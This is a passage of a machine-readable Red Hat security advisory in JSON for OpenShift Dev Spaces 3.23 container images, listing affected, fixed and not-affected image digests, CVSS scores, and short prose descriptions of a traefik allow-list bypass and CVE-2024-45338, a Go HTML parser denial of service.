            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "traefik: Bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes"
    },
    {
      "cve": "CVE-2024-45338",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2024-12-18T21:00:59.938173+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2333122"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in golang.org/x/net/html. This flaw allows an attacker to craft input to the parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This issue can cause a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang.org/x/net/html: Non-linear parsing of case-insensitive content in golang.org/x/net/html",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability is rated as an Important severity because an attacker can craft malicious input that causes the parsing functions to process data non-linearly, resulting in significant delays which leads to a denial of service by exhausting system resources.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
